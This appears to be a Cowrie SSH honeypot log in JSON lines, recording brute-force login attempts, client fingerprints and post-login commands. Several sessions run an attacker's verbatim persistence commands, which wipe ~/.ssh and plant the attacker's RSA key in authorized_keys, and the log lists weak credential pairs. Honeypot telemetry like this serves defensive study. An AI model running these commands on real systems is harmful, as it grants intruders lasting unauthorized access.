128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:49.124151Z","src_ip":"212.227.235.229","session":"ce5dc639b31a"}
{"eventid":"cowrie.login.failed","username":"ace","password":"ace","message":"login attempt [ace/ace] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:50.195878Z","src_ip":"212.227.235.229","session":"ce5dc639b31a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:51.752980Z","src_ip":"212.227.235.229","session":"ce5dc639b31a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41452,"dst_ip":"1.2.3.4","dst_port":22,"session":"88cffaae1dbe","protocol":"ssh","message":"New connection: 212.227.235.229:41452 (1.2.3.4:22) [session: 88cffaae1dbe]","sensor":"my-vps","timestamp":"2025-08-26T04:14:52.757137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:52.819719Z","src_ip":"212.227.235.229","session":"88cffaae1dbe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:53.013654Z","src_ip":"212.227.235.229","session":"88cffaae1dbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58314,"dst_ip":"1.2.3.4","dst_port":22,"session":"11f8c6c5cfa4","protocol":"ssh","message":"New connection: 212.227.235.229:58314 (1.2.3.4:22) [session: 11f8c6c5cfa4]","sensor":"my-vps","timestamp":"2025-08-26T04:14:53.627957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:53.642514Z","src_ip":"212.227.235.229","session":"11f8c6c5cfa4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:53.922240Z","src_ip":"212.227.235.229","session":"11f8c6c5cfa4"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:54.245736Z","src_ip":"212.227.235.229","session":"88cffaae1dbe"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:55.571280Z","src_ip":"212.227.235.229","session":"88cffaae1dbe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0987654321","message":"login attempt [admin/0987654321] failed","sensor":"my-vps","timestamp":"2025-08-26T04:14:56.906308Z","src_ip":"212.227.235.229","session":"11f8c6c5cfa4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:14:58.123469Z","src_ip":"212.227.235.229","session":"10fecaf90c63"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:14:58.394562Z","src_ip":"212.227.235.229","session":"10fecaf90c63"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:14:59.066577Z","src_ip":"212.227.235.229","session":"11f8c6c5cfa4"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":58642,"dst_ip":"1.2.3.4","dst_port":22,"session":"7674ec2eeea4","protocol":"ssh","message":"New connection: 103.217.145.104:58642 (1.2.3.4:22) [session: 7674ec2eeea4]","sensor":"my-vps","timestamp":"2025-08-26T04:15:05.826859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:15:05.827650Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:15:06.096011Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.login.success","username":"root","password":"1234qwer!","message":"login attempt [root/1234qwer!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:15:07.460780Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:15:08.045041Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:15:08.045724Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:15:08.046967Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:08.316391Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:15:08.910679Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:15:08.911378Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:15:09.190148Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:09.191065Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":58648,"dst_ip":"1.2.3.4","dst_port":22,"session":"78074e7b3d59","protocol":"ssh","message":"New connection: 103.217.145.104:58648 (1.2.3.4:22) [session: 78074e7b3d59]","sensor":"my-vps","timestamp":"2025-08-26T04:15:09.620241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:15:09.626149Z","src_ip":"103.217.145.104","session":"78074e7b3d59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:15:09.889472Z","src_ip":"103.217.145.104","session":"78074e7b3d59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52716,"dst_ip":"1.2.3.4","dst_port":22,"session":"060da8ba4a53","protocol":"ssh","message":"New connection: 212.227.235.229:52716 (1.2.3.4:22) [session: 060da8ba4a53]","sensor":"my-vps","timestamp":"2025-08-26T04:15:10.156459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:15:10.157218Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:15:10.437001Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:10.963274Z","src_ip":"103.217.145.104","session":"78074e7b3d59"}
{"eventid":"cowrie.login.success","username":"root","password":"super","message":"login attempt [root/super] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:15:11.598347Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:15:12.179351Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:15:12.180106Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:15:12.181253Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
